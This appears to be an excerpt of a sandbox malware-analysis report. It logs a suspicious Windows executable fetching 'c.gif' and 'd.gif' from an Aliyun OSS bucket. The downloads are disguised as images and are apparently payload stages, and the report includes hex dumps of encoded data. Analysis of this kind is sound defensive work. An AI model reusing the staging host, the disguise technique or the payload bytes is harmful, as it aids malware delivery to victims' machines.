                                    2025-01-13 12:47:36 UTC4096INData Raw: 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19 9a
                                    Data Ascii: _X$pdddefg`abc|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
                                    2025-01-13 12:47:36 UTC4096INData Raw: 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0 dd
                                    Data Ascii: mkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
                                    2025-01-13 12:47:36 UTC4096INData Raw: 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9 93
                                    Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
                                    2025-01-13 12:47:36 UTC4096INData Raw: d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7 90
                                    Data Ascii: ,|&#&z?JdPJ0z}|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i|k}mzf|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
                                    2025-01-13 12:47:36 UTC4096INData Raw: 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4 a1
                                    Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{|KH
                                    2025-01-13 12:47:36 UTC4096INData Raw: 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2 b9
                                    Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
                                    2025-01-13 12:47:36 UTC4096INData Raw: 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d ac
                                    Data Ascii: RWrlmnohfjkdefg`abc|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
                                    2025-01-13 12:47:36 UTC4096INData Raw: 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8 14
                                    Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-w*Zb*jhYklc8wP=0{y}@zvMbrqp
                                    2025-01-13 12:47:36 UTC4096INData Raw: 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf 52
                                    Data Ascii: mHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9|<d?p%~}~jJR


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.44994059.110.190.214436452C:\Users\user\Desktop\149876985-734579485.05.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-13 12:47:37 UTC106OUTGET /c.gif HTTP/1.1
                                    User-Agent: 3M
                                    Host: khec3y.oss-cn-beijing.aliyuncs.com
                                    Cache-Control: no-cache
                                    2025-01-13 12:47:38 UTC546INHTTP/1.1 200 OK
                                    Server: AliyunOSS
                                    Date: Mon, 13 Jan 2025 12:47:38 GMT
                                    Content-Type: image/gif
                                    Content-Length: 10681
                                    Connection: close
                                    x-oss-request-id: 67850B6AD4BE2037330EACC6
                                    Accept-Ranges: bytes
                                    ETag: "10A818386411EE834D99AE6B7B68BE71"
                                    Last-Modified: Mon, 13 Jan 2025 11:34:40 GMT
                                    x-oss-object-type: Normal
                                    x-oss-hash-crc64ecma: 10287299869673359293
                                    x-oss-storage-class: Standard
                                    x-oss-ec: 0048-00000104
                                    Content-Disposition: attachment
                                    x-oss-force-download: true
                                    Content-MD5: EKgYOGQR7oNNma5re2i+cQ==
                                    x-oss-server-time: 20
                                    2025-01-13 12:47:38 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                    Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                    2025-01-13 12:47:38 UTC4096INData Raw: 4d cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66
                                    Data Ascii: MbZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf
                                    2025-01-13 12:47:38 UTC3035INData Raw: 0f 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0
                                    Data Ascii: L]y%-/cZ<+Xd}_h48a*7?79:dOtLO2/uR& PeY e@l*UO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    4192.168.2.44995259.110.190.214436452C:\Users\user\Desktop\149876985-734579485.05.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-13 12:47:39 UTC106OUTGET /d.gif HTTP/1.1
                                    User-Agent: 3M
                                    Host: khec3y.oss-cn-beijing.aliyuncs.com
                                    Cache-Control: no-cache
                                    2025-01-13 12:47:40 UTC547INHTTP/1.1 200 OK
                                    Server: AliyunOSS
                                    Date: Mon, 13 Jan 2025 12:47:39 GMT
                                    Content-Type: image/gif
                                    Content-Length: 3892010
                                    Connection: close
                                    x-oss-request-id: 67850B6B99F00D3534474257
                                    Accept-Ranges: bytes
                                    ETag: "E4E46F3980A9D799B1BD7FC408F488A3"
                                    Last-Modified: Mon, 13 Jan 2025 11:34:51 GMT
                                    x-oss-object-type: Normal
                                    x-oss-hash-crc64ecma: 3363616613234190325
                                    x-oss-storage-class: Standard
                                    x-oss-ec: 0048-00000104
                                    Content-Disposition: attachment
                                    x-oss-force-download: true
                                    Content-MD5: 5ORvOYCp15mxvX/ECPSIow==
                                    x-oss-server-time: 21
                                    2025-01-13 12:47:40 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                    Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                    2025-01-13 12:47:40 UTC4096INData Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4
                                    Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V|
                                    2025-01-13 12:47:40 UTC4096INData Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f
                                    Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
                                    2025-01-13 12:47:40 UTC4096INData Raw: 97 9b 9d 99 9d 9b 95 97 95 8b 8d 89 8d 8b b5 b7 b5 bb bd bf 2d db b5 b7 b1 8b 8d 8f 8d 8b 95 95 95 fb 9c 9f 9d 8b 95 97 95 8b 8d 8f 9d 8b f5 f7 f5 fb fd ff fd eb f5 f7 f5 8b 8d 8f 9d 8b 95 97 95 9b 9d 9f 9d 9b 95 87 95 8b 8d 8f 12 a4 b5 e6 b5 bb bd ff 4a 92 b5 3b b5 8b 8d 8f 0d eb 95 77 94 9b 9d df 82 fb 95 0f a8 8b 8d 8f 8d 8b 75 77 75 7b 7d 7f 1d 1b 75 47 60 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b b5 b7 b5 bb bd bf bd bb b5 b7 b5 8b 8d 8f 93 eb 95 d7 94 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f cd ae f5 7f f5 fb fd ff fd fb f5 f7 f5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d a1 f9 ee cd c3 b5 bb bd ef d4 ba b5 b7 a5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b 75 57 75 7b 1d 51 0f 1f 14 03 14 8b 8d f9 36 8b 95
                                    Data Ascii: -J;wuwu{}uG`uWu{Q6
                                    2025-01-13 12:47:40 UTC4096INData Raw: 69 18 0b cc ef 77 23 0b dc 62 f5 92 bd ff f0 55 8b 71 aa 3a 3d 2b 0e e8 a2 e1 cd ea 57 ca 72 3f 3b a3 53 99 f3 19 2d 50 82 0e 0d 67 11 12 78 ff f7 c0 c2 9c d0 1f 35 b3 d6 c1 15 8b 71 1a 1f 9f 00 52 44 b6 6f bf 5c 42 7e 10 b4 79 e0 70 9b ec ea 3e 72 2b 74 62 9c c8 03 89 51 17 b4 ee 50 26 6c f4 04 88 dc ad 35 53 4d 06 b8 17 18 42 ac 5e c3 76 8a e3 0f 55 bd 10 fb 3f 3d a9 48 9d ea 3a a4 e2 a6 b4 3f 76 ce a4 1c 7c fb f9 82 7d fe 97 54 b4 b3 68 d2 ca 6b fa 63 cb 18 ff 4a 19 f9 7b ce a8 14 4b 2d e1 e4 ac ec 85 7b 1e 75 a1 29 ef 25 b4 c1 12 a6 c8 7c 21 bf 95 a2 cb d0 51 3b 62 af 3a aa cc 42 6d 00 8c 79 d0 be 06 b6 82 9f 76 84 17 1f 9e 9d b0 29 42 92 30 ee 02 cb 2e 78 cc a6 12 f0 07 e3 66 63 9f 49 05 39 61 2f 8e d5 7d 9a 70 87 1f c6 95 13 f3 f5 88 62 22 f4 1a 33
                                    Data Ascii: iw#bUq:=+Wr?;S-Pgx5qRDo\B~yp>r+tbQP&l5SMB^vU?=H:?v|}ThkcJ{K-{u)%|!Q;b:Bmyv)B0.xfcI9a/}pb"3
                                    2025-01-13 12:47:40 UTC4096INData Raw: 59 fc a8 65 45 fc 8d 05 fd fb b3 9f 14 a2 f6 f8 cc c4 eb 39 9d d3 a3 9f a0 42 0a 18 58 74 c7 69 1d eb 8b bf f8 0a 86 d0 b8 94 b7 61 b0 9e 73 a2 69 b3 40 d3 c4 61 59 75 53 34 0e c7 4a cf b1 8f a5 1c 40 ae d5 10 f9 b3 9d 63 52 15 9e 8b 52 f6 a8 f0 ad 49 d7 f7 72 8e 78 64 f5 39 5f 0b 52 de 78 1c 55 45 37 4b fa 52 4d 22 ef 1a 7a 2b 77 55 11 34 b8 02 76 4b bc 41 00 36 50 70 72 34 04 b2 fc fc b3 02 62 64 d3 fa df dd e5 b8 e2 bd 6c e5 a6 e2 23 8e 49 61 66 4b de 3e d6 1f 11 74 6a d1 49 c0 da 1e df 8c f9 36 8a 61 dc e3 8e c6 1a 21 61 99 12 00 4b bc 3f 2f 86 71 66 94 e7 b9 fd a5 2f a6 09 9c b6 7f c9 3c 7d 99 5e d8 fd f5 f6 1c ce 71 0e c8 38 12 5d a5 a6 a8 b9 81 05 24 3e 7f 87 5f e9 b2 ac d8 50 4b 41 40 ae 76 80 40 a4 58 df 93 6f bb a4 25 c4 dc 1b f9 98 6d 46 50 50
                                    Data Ascii: YeE9BXtiasi@aYuS4J@cRRIrxd9_RxUE7KRM"z+wU4vKA6Ppr4bdl#IafK>tjI6a!aK?/qf/<}^q8]$>_PKA@v@Xo%mFPP
